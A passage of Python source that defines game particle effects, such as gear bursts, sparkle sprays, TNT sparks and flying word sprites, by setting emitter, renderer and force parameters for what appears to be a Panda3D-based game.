    """Wide burst of gear sprites pulled back down by a sink force.

    Resets this effect in place, then attaches one gear-sprite system
    (pool of 40 released in a single litter of 40 — an explosion burst)
    and a ForceGroup with a LinearSinkForce below the origin that acts
    like gravity pulling the gears back down.
    """
    self.reset()
    self.setPos(0.000, 0.000, 0.000)
    self.setHpr(0.000, 0.000, 0.000)
    self.setScale(1.000, 1.000, 1.000)
    p0 = Particles.Particles('particles-1')
    # Particles parameters
    p0.setFactory("PointParticleFactory")
    p0.setRenderer("SpriteParticleRenderer")
    p0.setEmitter("SphereVolumeEmitter")
    p0.setPoolSize(40)
    p0.setBirthRate(0.1000)
    p0.setLitterSize(40)
    p0.setLitterSpread(0)
    p0.setSystemLifespan(0.0000)
    p0.setLocalVelocityFlag(1)
    p0.setSystemGrowsOlderFlag(0)
    # Factory parameters
    p0.factory.setLifespanBase(4.2000)
    p0.factory.setLifespanSpread(0.0000)
    p0.factory.setMassBase(1.0000)
    p0.factory.setMassSpread(0.0000)
    p0.factory.setTerminalVelocityBase(400.0000)
    p0.factory.setTerminalVelocitySpread(0.0000)
    # Point factory parameters
    # Renderer parameters
    p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
    p0.renderer.setUserAlpha(1.00)
    # Sprite parameters
    p0.renderer.setIgnoreScale(1)
    p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/gear")
    p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
    p0.renderer.setXScaleFlag(0)
    p0.renderer.setYScaleFlag(0)
    p0.renderer.setAnimAngleFlag(0)
    p0.renderer.setInitialXScale(0.1600)
    p0.renderer.setFinalXScale(0.1600)
    p0.renderer.setInitialYScale(0.1600)
    p0.renderer.setFinalYScale(0.1600)
    p0.renderer.setNonanimatedTheta(0.0000)
    p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
    p0.renderer.setAlphaDisable(0)
    # Emitter parameters
    p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
    p0.emitter.setAmplitude(15.0000)
    p0.emitter.setAmplitudeSpread(0.0000)
    # Upward offset force gives the burst its initial vertical kick.
    p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 10.0000))
    p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
    p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, -0.5000))
    # Sphere Volume parameters
    p0.emitter.setRadius(1.7500)
    self.addParticles(p0)
    f0 = ForceGroup.ForceGroup('forces')
    # Force parameters
    force0 = LinearSinkForce(Point3(0.0000, 0.0000, -79.0000), LinearDistanceForce.FTONEOVERRSQUARED, 15.9701, 95.0000, 1)
    force0.setActive(1)
    f0.addForce(force0)
    self.addForceGroup(f0)
@particle
def pixieSpray(self):
    """Blue-edged sparkle spray from a disc emitter ("pixie dust").

    Resets this effect in place, then attaches one SparkleParticleRenderer
    system on a DiscEmitter, plus a ForceGroup whose LinearSinkForce bends
    the spray toward a point below the emitter.
    """
    self.reset()
    self.setPos(2.00, 0.000, 4.00)
    self.setHpr(-90.000, 45.000, 0.000)
    self.setScale(4.000, 4.000, 4.000)
    p0 = Particles.Particles('particles-1')
    # Particles parameters
    p0.setFactory("PointParticleFactory")
    p0.setRenderer("SparkleParticleRenderer")
    p0.setEmitter("DiscEmitter")
    p0.setPoolSize(50)
    p0.setBirthRate(0.0500)
    p0.setLitterSize(4)
    p0.setLitterSpread(1)
    p0.setSystemLifespan(0.0000)
    p0.setLocalVelocityFlag(1)
    p0.setSystemGrowsOlderFlag(0)
    # Factory parameters
    p0.factory.setLifespanBase(0.6000)
    p0.factory.setLifespanSpread(0.1000)
    p0.factory.setMassBase(1.0000)
    p0.factory.setMassSpread(0.0000)
    p0.factory.setTerminalVelocityBase(400.0000)
    p0.factory.setTerminalVelocitySpread(0.0000)
    # Point factory parameters
    # Renderer parameters
    p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHANONE)
    p0.renderer.setUserAlpha(1.00)
    # Sparkle parameters
    p0.renderer.setCenterColor(Vec4(1.00, 1.00, 1.00, 1.00))
    p0.renderer.setEdgeColor(Vec4(0.00, 0.00, 1.00, 1.00))
    p0.renderer.setBirthRadius(0.0200)
    p0.renderer.setDeathRadius(0.0500)
    p0.renderer.setLifeScale(SparkleParticleRenderer.SPNOSCALE)
    # Emitter parameters
    p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
    p0.emitter.setAmplitude(3.5000)
    p0.emitter.setAmplitudeSpread(0.0000)
    p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
    p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
    p0.emitter.setRadiateOrigin(Point3(0.0000, -3.0000, 0.0000))
    # Disc parameters
    p0.emitter.setRadius(0.100)
    self.addParticles(p0)
    f0 = ForceGroup.ForceGroup('forces')
    # Force parameters
    force0 = LinearSinkForce(Point3(0.0000, 0.0000, -30.0000), LinearDistanceForce.FTONEOVERRSQUARED, 3.0400, 1.5000, 1)
    force0.setActive(1)
    f0.addForce(force0)
    self.addForceGroup(f0)
@particle
def synergy(self):
    """Dense ring of green dollar-sign sprites with mild jitter.

    Resets this effect in place, then attaches one sprite system on a
    RingEmitter (large pool, very fast birth rate for a continuous ring)
    and a ForceGroup ('jfo') containing a gentle LinearJitterForce.
    """
    self.reset()
    self.setPos(0, 7.8, 0.4)
    self.setHpr(90.000, 0.000, 0.000)
    self.setScale(1.000, 1.000, 1.000)
    p0 = Particles.Particles('particles-1')
    # Particles parameters
    p0.setFactory("PointParticleFactory")
    p0.setRenderer("SpriteParticleRenderer")
    p0.setEmitter("RingEmitter")
    p0.setPoolSize(250)
    p0.setBirthRate(0.0100)
    p0.setLitterSize(1)
    p0.setLitterSpread(0)
    p0.setSystemLifespan(0.0000)
    p0.setLocalVelocityFlag(1)
    p0.setSystemGrowsOlderFlag(0)
    # Factory parameters
    p0.factory.setLifespanBase(1.6)
    p0.factory.setLifespanSpread(0.0000)
    p0.factory.setMassBase(1.0000)
    p0.factory.setMassSpread(0.0000)
    p0.factory.setTerminalVelocityBase(400.0000)
    p0.factory.setTerminalVelocitySpread(0.0000)
    # Point factory parameters
    # Renderer parameters
    p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
    p0.renderer.setUserAlpha(1.00)
    # Sprite parameters
    p0.renderer.setIgnoreScale(1)
    p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/dollar-sign")
    p0.renderer.setColor(Vec4(0.00, 1.00, 0.00, 1.00))
    p0.renderer.setXScaleFlag(0)
    p0.renderer.setYScaleFlag(0)
    p0.renderer.setAnimAngleFlag(0)
    p0.renderer.setInitialXScale(0.2)
    p0.renderer.setFinalXScale(0.2)
    p0.renderer.setInitialYScale(0.2)
    p0.renderer.setFinalYScale(0.2)
    p0.renderer.setNonanimatedTheta(20.0000)
    p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
    p0.renderer.setAlphaDisable(0)
    # Emitter parameters
    p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
    p0.emitter.setAmplitude(5.0697)
    p0.emitter.setAmplitudeSpread(0.0000)
    p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
    p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
    p0.emitter.setRadiateOrigin(Point3(-4.0000, 0.0000, 0.0000))
    # Ring parameters
    p0.emitter.setRadius(1.8607)
    self.addParticles(p0)
    f0 = ForceGroup.ForceGroup('jfo')
    # Force parameters
    force0 = LinearJitterForce(1.0000, 0)
    force0.setActive(1)
    f0.addForce(force0)
    self.addForceGroup(f0)
@particle
def soundWave(self):
    """Expanding translucent circle sprites suggesting sound waves.

    Resets this effect in place, then attaches one sprite system on a
    PointEmitter.  Particles stay at the origin (explicit emission with a
    zero launch vector) and animate from scale 0 to 3 while fading out,
    composited additively via ColorBlendAttrib.
    """
    self.reset()
    self.setPos(0.000, 0.000, 0.000)
    self.setHpr(0.000, 0.000, 0.000)
    self.setScale(7.000, 7.000, 7.000)
    p0 = Particles.Particles('particles-1')
    # Particles parameters
    p0.setFactory("PointParticleFactory")
    p0.setRenderer("SpriteParticleRenderer")
    p0.setEmitter("PointEmitter")
    p0.setPoolSize(128)
    p0.setBirthRate(0.4000)
    p0.setLitterSize(1)
    p0.setLitterSpread(0)
    p0.setSystemLifespan(10.0000)
    p0.setLocalVelocityFlag(1)
    p0.setSystemGrowsOlderFlag(0)
    # Factory parameters
    p0.factory.setLifespanBase(4.0000)
    p0.factory.setLifespanSpread(0.0000)
    p0.factory.setMassBase(0.0010)
    p0.factory.setMassSpread(0.0000)
    p0.factory.setTerminalVelocityBase(0.0000)
    p0.factory.setTerminalVelocitySpread(0.0000)
    # Point factory parameters
    # Renderer parameters
    p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAOUT)
    p0.renderer.setUserAlpha(1.00)
    # Sprite parameters
    p0.renderer.setTextureFromNode("phase_5/models/props/uberSoundEffects", "**/Circle")
    #p0.renderer.addTextureFromFile('maps/Circle.tif')
    p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
    p0.renderer.setXScaleFlag(1)
    p0.renderer.setYScaleFlag(1)
    p0.renderer.setAnimAngleFlag(0)
    p0.renderer.setInitialXScale(0.0000)
    p0.renderer.setFinalXScale(3.0000)
    p0.renderer.setInitialYScale(0.0000)
    p0.renderer.setFinalYScale(3.0000)
    p0.renderer.setNonanimatedTheta(0.0000)
    p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
    p0.renderer.setAlphaDisable(1)
    # Additive blend (incoming-alpha * src + dst) makes overlapping rings glow.
    p0.renderer.setColorBlendMode(ColorBlendAttrib.MAdd, ColorBlendAttrib.OIncomingAlpha, ColorBlendAttrib.OOne)
    # Emitter parameters
    p0.emitter.setEmissionType(BaseParticleEmitter.ETEXPLICIT)
    p0.emitter.setAmplitude(0.0100)
    p0.emitter.setAmplitudeSpread(0.0000)
    p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
    p0.emitter.setExplicitLaunchVector(Vec3(0.0000, 0.0000, 0.0000))
    p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 0.0000))
    # Point parameters
    p0.emitter.setLocation(Point3(0.0000, 0.0000, 0.0000))
    self.addParticles(p0)
@particle
def tnt(self):
    """Spark-sprite fizz for a lit TNT fuse, pulled by a sink force.

    Resets this effect in place, then attaches one spark-sprite system
    on a small SphereVolumeEmitter and a ForceGroup whose LinearSinkForce
    drags sparks toward a point below the effect.
    """
    self.reset()
    self.setPos(0.000, 0.000, -0.600)
    self.setHpr(0.000, 10.000, 0.000)
    self.setScale(1.000, 1.000, 1.000)
    p0 = Particles.Particles('particles-1')
    # Particles parameters
    p0.setFactory("PointParticleFactory")
    p0.setRenderer("SpriteParticleRenderer")
    p0.setEmitter("SphereVolumeEmitter")
    p0.setPoolSize(40)
    p0.setBirthRate(0.1000)
    p0.setLitterSize(2)
    p0.setLitterSpread(0)
    p0.setSystemLifespan(0.0000)
    p0.setLocalVelocityFlag(1)
    p0.setSystemGrowsOlderFlag(0)
    # Factory parameters
    p0.factory.setLifespanBase(1.2000)
    p0.factory.setLifespanSpread(0.0000)
    p0.factory.setMassBase(1.0000)
    p0.factory.setMassSpread(0.0000)
    p0.factory.setTerminalVelocityBase(400.0000)
    p0.factory.setTerminalVelocitySpread(0.0000)
    # Point factory parameters
    # Renderer parameters
    p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
    p0.renderer.setUserAlpha(1.00)
    # Sprite parameters
    p0.renderer.setIgnoreScale(1)
    p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/spark")
    p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
    p0.renderer.setXScaleFlag(1)
    p0.renderer.setYScaleFlag(1)
    p0.renderer.setAnimAngleFlag(0)
    p0.renderer.setInitialXScale(0.3)
    p0.renderer.setFinalXScale(0.3)
    p0.renderer.setInitialYScale(0.3)
    # NOTE(review): 0.03 breaks the 0.3 symmetry of the other three scales —
    # possibly a typo for 0.3; confirm against the intended visual before changing.
    p0.renderer.setFinalYScale(0.03)
    p0.renderer.setNonanimatedTheta(20.0000)
    p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
    p0.renderer.setAlphaDisable(0)
    # Sparkle parameters
    #p0.renderer.setCenterColor(Vec4(0.78, 0.78, 0, 1.00))
    #p0.renderer.setEdgeColor(Vec4(0.78, 0.78, 0, 1.00))
    #p0.renderer.setBirthRadius(0.0600)
    #p0.renderer.setDeathRadius(0.0600)
    #p0.renderer.setLifeScale(SparkleParticleRenderer.SPNOSCALE)
    # Emitter parameters
    p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
    p0.emitter.setAmplitude(1.5000)
    p0.emitter.setAmplitudeSpread(0.0000)
    p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
    p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
    p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, -2.0000))
    # Sphere Volume parameters
    p0.emitter.setRadius(0.2282)
    self.addParticles(p0)
    f0 = ForceGroup.ForceGroup('forces')
    # Force parameters
    force0 = LinearSinkForce(Point3(0.0000, 0.0000, -19.0000), LinearDistanceForce.FTONEOVERRSQUARED, 15.9701, 95.0100, 1)
    force0.setActive(1)
    f0.addForce(force0)
    self.addForceGroup(f0)
@particle
def doubleTalkLeft(self):
    """Sparse stream of "doubletalk" word sprites angled to one side.

    Resets this effect in place, then attaches one sprite system (pool of
    only 2, slow birth rate) from a tiny SphereVolumeEmitter, plus a
    ForceGroup whose LinearSinkForce curves the sprites sideways.
    """
    self.reset()
    self.setPos(0.000, 3.000, 3.000)
    self.setHpr(55.000, 0.000, 0.000)
    self.setScale(3.000, 3.000, 3.000)
    p0 = Particles.Particles('particles-1')
    # Particles parameters
    p0.setFactory("PointParticleFactory")
    p0.setRenderer("SpriteParticleRenderer")
    p0.setEmitter("SphereVolumeEmitter")
    p0.setPoolSize(2)
    p0.setBirthRate(0.7000)
    p0.setLitterSize(1)
    p0.setLitterSpread(0)
    p0.setSystemLifespan(0.0000)
    p0.setLocalVelocityFlag(1)
    p0.setSystemGrowsOlderFlag(0)
    # Factory parameters
    p0.factory.setLifespanBase(1.7000)
    p0.factory.setLifespanSpread(0.0000)
    p0.factory.setMassBase(1.0000)
    p0.factory.setMassSpread(0.0000)
    p0.factory.setTerminalVelocityBase(400.0000)
    p0.factory.setTerminalVelocitySpread(0.0000)
    # Point factory parameters
    # Renderer parameters
    p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
    p0.renderer.setUserAlpha(1.00)
    # Sprite parameters
    p0.renderer.setIgnoreScale(1)
    p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/doubletalk-double")
    p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
    p0.renderer.setXScaleFlag(0)
    p0.renderer.setYScaleFlag(0)
    p0.renderer.setAnimAngleFlag(0)
    p0.renderer.setInitialXScale(1.50)
    p0.renderer.setFinalXScale(1.50)
    p0.renderer.setInitialYScale(1.50)
    p0.renderer.setFinalYScale(1.50)
    p0.renderer.setNonanimatedTheta(0.0000)
    p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
    p0.renderer.setAlphaDisable(0)
    # Emitter parameters
    p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
    p0.emitter.setAmplitude(12.000)
    p0.emitter.setAmplitudeSpread(0.0000)
    p0.emitter.setOffsetForce(Vec3(0.0000, 0.6000, 0.0000))
    p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
    p0.emitter.setRadiateOrigin(Point3(0.0000, -8.0000, 0.0000))
    # Sphere Volume parameters
    p0.emitter.setRadius(0.0500)
    self.addParticles(p0)
    f0 = ForceGroup.ForceGroup('forces')
    # Force parameters
    force0 = LinearSinkForce(Point3(6.000, -3.0000, 0.0000), LinearDistanceForce.FTONEOVERRSQUARED, 1.0000, 1.5000, 1)
    force0.setActive(1)
    f0.addForce(force0)
    self.addForceGroup(f0)
@particle
def pixieWall(self):
    """Wall of shrinking blue-edged sparkles launched in a single sheet.

    Resets this effect in place, then attaches one SparkleParticleRenderer
    system on a DiscEmitter (litters of 100 — effectively a burst per tick)
    and a ForceGroup with a mild LinearNoiseForce for shimmer.
    """
    self.reset()
    self.setPos(2.500, 0.000, 2.500)
    self.setHpr(-90.000, 90.000, -180.000)
    self.setScale(1.50)
    p0 = Particles.Particles('particles-1')
    # Particles parameters
    p0.setFactory("PointParticleFactory")
    p0.setRenderer("SparkleParticleRenderer")
    p0.setEmitter("DiscEmitter")
    p0.setPoolSize(100)
    p0.setBirthRate(0.1000)
    p0.setLitterSize(100)
    p0.setLitterSpread(0)
    p0.setSystemLifespan(0.0000)
    p0.setLocalVelocityFlag(1)
    p0.setSystemGrowsOlderFlag(0)
    # Factory parameters
    p0.factory.setLifespanBase(4.0000)
    p0.factory.setLifespanSpread(0.2000)
    p0.factory.setMassBase(1.0000)
    p0.factory.setMassSpread(0.0000)
    p0.factory.setTerminalVelocityBase(400.0000)
    p0.factory.setTerminalVelocitySpread(0.0000)
    # Point factory parameters
    # Renderer parameters
    p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAOUT)
    p0.renderer.setUserAlpha(1.00)
    # Sparkle parameters
    p0.renderer.setCenterColor(Vec4(1.00, 1.00, 1.00, 1.00))
    p0.renderer.setEdgeColor(Vec4(0.00, 0.00, 1.00, 1.00))
    p0.renderer.setBirthRadius(0.0400)
    # Death radius 0 shrinks each sparkle to nothing over its lifespan.
    p0.renderer.setDeathRadius(0.0000)
    p0.renderer.setLifeScale(SparkleParticleRenderer.SPNOSCALE)
    # Emitter parameters
    p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
    p0.emitter.setAmplitude(2.5000)
    p0.emitter.setAmplitudeSpread(0.5000)
    p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
    p0.emitter.setExplicitLaunchVector(Vec3(0.0000, 0.0000, 1.0000))
    p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, -1.0000))
    # Disc parameters
    p0.emitter.setRadius(0.5000)
    self.addParticles(p0)
    f0 = ForceGroup.ForceGroup('forces')
    # Force parameters
    force0 = LinearNoiseForce(0.0500, 0)
    force0.setActive(1)
    f0.addForce(force0)
    self.addForceGroup(f0)
@particle
def schmoozeUpperSpray(self):
    """Single "schmooze" word sprite sprayed upward and pulled away.

    Resets this effect in place, then attaches one sprite system (pool of
    1 — a single sprite at a time that shrinks over its lifespan) and a
    ForceGroup whose LinearSinkForce pulls it down and away.
    """
    self.reset()
    self.setPos(0.000, 3.000, 4.000)
    self.setHpr(0.000, 55.000, 0.000)
    self.setScale(1.000, 1.000, 1.000)
    p0 = Particles.Particles('particles-1')
    # Particles parameters
    p0.setFactory("PointParticleFactory")
    p0.setRenderer("SpriteParticleRenderer")
    p0.setEmitter("SphereVolumeEmitter")
    p0.setPoolSize(1)
    p0.setBirthRate(0.400)
    p0.setLitterSize(1)
    p0.setLitterSpread(0)
    p0.setSystemLifespan(0.0000)
    p0.setLocalVelocityFlag(1)
    p0.setSystemGrowsOlderFlag(0)
    # Factory parameters
    p0.factory.setLifespanBase(1.900)
    p0.factory.setLifespanSpread(0.0000)
    p0.factory.setMassBase(1.0000)
    p0.factory.setMassSpread(0.0000)
    p0.factory.setTerminalVelocityBase(400.0000)
    p0.factory.setTerminalVelocitySpread(0.0000)
    # Point factory parameters
    # Renderer parameters
    p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
    p0.renderer.setUserAlpha(1.00)
    # Sprite parameters
    p0.renderer.setIgnoreScale(1)
    p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/schmooze-master")
    p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
    p0.renderer.setXScaleFlag(0)
    p0.renderer.setYScaleFlag(0)
    p0.renderer.setAnimAngleFlag(0)
    # Sprite shrinks as it travels (0.7 -> 0.07 wide, 0.35 -> 0.07 tall).
    p0.renderer.setInitialXScale(0.7)
    p0.renderer.setFinalXScale(0.07)
    p0.renderer.setInitialYScale(0.35)
    p0.renderer.setFinalYScale(0.07)
    p0.renderer.setNonanimatedTheta(0.0000)
    p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
    p0.renderer.setAlphaDisable(0)
    # Emitter parameters
    p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
    p0.emitter.setAmplitude(5.0000)
    p0.emitter.setAmplitudeSpread(0.0000)
    p0.emitter.setOffsetForce(Vec3(0.0000, 11.0000, 0.0000))
    p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
    p0.emitter.setRadiateOrigin(Point3(0.0000, -1.0000, 0.0000))
    # Sphere Volume parameters
    p0.emitter.setRadius(0.1000)
    self.addParticles(p0)
    f0 = ForceGroup.ForceGroup('forces')
    # Force parameters
    force0 = LinearSinkForce(Point3(0.0000, -23.0000, -9.0000), LinearDistanceForce.FTONEOVERRSQUARED, 1.0000, 1.3661, 1)
    force0.setActive(1)
    f0.addForce(force0)
    self.addForceGroup(f0)
@particle
def firedBaseFlame(self):
    """Dense, short-lived fire-sprite column at the base of a "fired" effect.

    Resets this effect in place, then attaches one fire-sprite system:
    very fast birth rate with a 0.1s lifespan, rising via an upward
    emitter offset force.  No force group.
    """
    self.reset()
    self.setPos(0.000, 0.000, 0.500)
    self.setHpr(0.000, 0.000, 0.000)
    self.setScale(2.500, 4.500, 2.500)
    p0 = Particles.Particles('particles-1')
    # Particles parameters
    p0.setFactory("PointParticleFactory")
    p0.setRenderer("SpriteParticleRenderer")
    p0.setEmitter("SphereVolumeEmitter")
    p0.setPoolSize(150)
    p0.setBirthRate(0.0200)
    p0.setLitterSize(10)
    p0.setLitterSpread(0)
    p0.setSystemLifespan(0.0000)
    p0.setLocalVelocityFlag(1)
    p0.setSystemGrowsOlderFlag(0)
    # Factory parameters
    p0.factory.setLifespanBase(0.100)
    p0.factory.setLifespanSpread(0.0000)
    p0.factory.setMassBase(1.0000)
    p0.factory.setMassSpread(0.0000)
    p0.factory.setTerminalVelocityBase(400.0000)
    p0.factory.setTerminalVelocitySpread(0.0000)
    # Point factory parameters
    # Renderer parameters
    p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
    p0.renderer.setUserAlpha(1.00)
    # Sprite parameters
    p0.renderer.setIgnoreScale(1)
    p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/fire")
    p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
    p0.renderer.setXScaleFlag(0)
    p0.renderer.setYScaleFlag(0)
    p0.renderer.setAnimAngleFlag(0)
    p0.renderer.setInitialXScale(0.15)
    p0.renderer.setFinalXScale(0.50)
    p0.renderer.setInitialYScale(0.30)
    p0.renderer.setFinalYScale(0.50)
    p0.renderer.setNonanimatedTheta(0.0000)
    p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
    p0.renderer.setAlphaDisable(0)
    # Emitter parameters
    p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
    p0.emitter.setAmplitude(1.0000)
    p0.emitter.setAmplitudeSpread(0.0000)
    # Upward offset makes the flames climb.
    p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 2.200))
    p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
    p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, -30.0000))
    # Sphere Volume parameters
    p0.emitter.setRadius(0.4000)
    self.addParticles(p0)
@particle
def headShrinkSpray(self):
    """Gold sparkle spray for the head-shrink attack.

    Resets this effect in place, then attaches one SparkleParticleRenderer
    system (gold center, translucent white edge, shrinking to nothing) and
    a ForceGroup combining a sink force below and a constant pull back
    along -Y.
    """
    self.reset()
    self.setPos(0.000, 2.900, 4.200)
    self.setHpr(0.000, 60.000, 0.000)
    self.setScale(1.000, 1.000, 1.000)
    p0 = Particles.Particles('particles-1')
    # Particles parameters
    p0.setFactory("PointParticleFactory")
    p0.setRenderer("SparkleParticleRenderer")
    p0.setEmitter("SphereVolumeEmitter")
    p0.setPoolSize(60) #60)
    p0.setBirthRate(0.1000)
    p0.setLitterSize(4)
    p0.setLitterSpread(2)
    p0.setSystemLifespan(0.0000)
    p0.setLocalVelocityFlag(1)
    p0.setSystemGrowsOlderFlag(0)
    # Factory parameters
    p0.factory.setLifespanBase(1.15) #1.1200)
    p0.factory.setLifespanSpread(0.0000)
    p0.factory.setMassBase(1.0000)
    p0.factory.setMassSpread(0.0000)
    p0.factory.setTerminalVelocityBase(400.0000)
    p0.factory.setTerminalVelocitySpread(0.0000)
    # Point factory parameters
    # Renderer parameters
    p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
    p0.renderer.setUserAlpha(1.00)
    # Sparkle parameters
    p0.renderer.setCenterColor(Vec4(1, 0.84, 0, 1.00))
    p0.renderer.setEdgeColor(Vec4(1, 1, 1, 0.3))
    p0.renderer.setBirthRadius(0.1500)
    p0.renderer.setDeathRadius(0.0000)
    p0.renderer.setLifeScale(SparkleParticleRenderer.SPNOSCALE)
    # Emitter parameters
    p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
    p0.emitter.setAmplitude(12.0000)
    p0.emitter.setAmplitudeSpread(0.9000)
    p0.emitter.setOffsetForce(Vec3(0.0000, 5.1000, 0.0000))
    p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
    p0.emitter.setRadiateOrigin(Point3(0.0000, -4.0000, 0.0000))
    # Sphere Volume parameters
    p0.emitter.setRadius(0.4800)
    self.addParticles(p0)
    f0 = ForceGroup.ForceGroup('forces')
    # Force parameters
    force0 = LinearSinkForce(Point3(0.0000, 0.0000, -4.0000), LinearDistanceForce.FTONEOVERRSQUARED, 1.0000, 2.5308, 1)
    force0.setActive(1)
    f0.addForce(force0)
    force1 = LinearVectorForce(Vec3(0.0000, -7.0000, 0.0000), 1.0000, 0)
    force1.setActive(1)
    f0.addForce(force1)
    self.addForceGroup(f0)
@particle
def jargonSpray(self):
    """Growing "jargon" word sprites sprayed forward with jitter.

    Resets this effect in place, then attaches one sprite system on a
    LineEmitter and a ForceGroup with a LinearJitterForce for wobble.
    """
    self.reset()
    self.setPos(0.000, 3.000, 4.000)
    self.setHpr(0.000, 0.000, 0.000)
    self.setScale(1.000, 1.000, 1.000)
    p0 = Particles.Particles('particles-1')
    # Particles parameters
    p0.setFactory("PointParticleFactory")
    p0.setRenderer("SpriteParticleRenderer")
    p0.setEmitter("LineEmitter")
    p0.setPoolSize(4)
    p0.setBirthRate(0.200)
    p0.setLitterSize(1)
    p0.setLitterSpread(0)
    p0.setSystemLifespan(0.0000)
    p0.setLocalVelocityFlag(1)
    p0.setSystemGrowsOlderFlag(0)
    # Factory parameters
    p0.factory.setLifespanBase(1.0000)
    p0.factory.setLifespanSpread(0.2000)
    p0.factory.setMassBase(1.0000)
    p0.factory.setMassSpread(0.0000)
    p0.factory.setTerminalVelocityBase(400.0000)
    p0.factory.setTerminalVelocitySpread(0.0000)
    # Point factory parameters
    # Renderer parameters
    p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
    p0.renderer.setUserAlpha(1.00)
    # Sprite parameters
    p0.renderer.setIgnoreScale(1)
    p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/jargon-brow")
    p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
    p0.renderer.setXScaleFlag(1)
    p0.renderer.setYScaleFlag(1)
    p0.renderer.setAnimAngleFlag(0)
    # Sprites grow 4x over their lifespan as they fly outward.
    p0.renderer.setInitialXScale(0.40)
    p0.renderer.setFinalXScale(1.60)
    p0.renderer.setInitialYScale(0.10)
    p0.renderer.setFinalYScale(0.40)
    p0.renderer.setNonanimatedTheta(0.0000)
    p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
    p0.renderer.setAlphaDisable(0)
    # Emitter parameters
    p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
    p0.emitter.setAmplitude(5.0000)
    p0.emitter.setAmplitudeSpread(0.0000)
    p0.emitter.setOffsetForce(Vec3(0.0000, 4.0000, 0.0000))
    p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
    p0.emitter.setRadiateOrigin(Point3(0.0000, -9.0000, 0.0000))
    # Line parameters
    # NOTE(review): both endpoints identical -> the line emitter degenerates
    # to a point at the origin; presumably intentional, but confirm.
    p0.emitter.setEndpoint1(Point3(0.0000, 0.0000, 0.0000))
    p0.emitter.setEndpoint2(Point3(0.0000, 0.0000, 0.0000))
    self.addParticles(p0)
    f0 = ForceGroup.ForceGroup('forces')
    # Force parameters
    force0 = LinearJitterForce(2.1279, 0)
    force0.setActive(1)
    f0.addForce(force0)
    self.addForceGroup(f0)
@particle
def legaleseSpray(self):
    """Single growing black word sprite with heavy jitter ("legalese").

    Resets this effect in place, then attaches one sprite system (pool of
    1, effectively a point emitter with radius 0.001) and a ForceGroup
    whose strong LinearJitterForce shakes the sprite as it flies.
    """
    self.reset()
    self.setPos(0.000, 2.000, 3.000)
    self.setHpr(0.000, 0.000, 0.000)
    self.setScale(1.000, 1.000, 1.000)
